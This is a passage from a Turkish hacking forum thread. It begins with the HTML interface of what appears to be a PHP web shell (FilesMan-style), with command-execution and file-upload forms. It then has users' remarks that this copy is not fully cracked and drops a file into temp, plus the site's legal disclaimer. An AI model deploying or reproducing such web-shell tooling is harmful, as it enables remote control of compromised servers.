        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    </tr><tr>
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='/runtime/php/3zed5ph8s_3zem5e9q4/'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='Windows-1251'>
        <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
    </tr></table></div></body></html>


bu arada bu tam kırılmış hali değilmiş yeni fark ettim :D

bir dosya çıkartıyor tempe yarın daha detaylı analiz ederim.
Genişletmek için tıkla ...
Detaylı analiz sonrasında nasıl yaptığını kısaca anlatır mısın
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.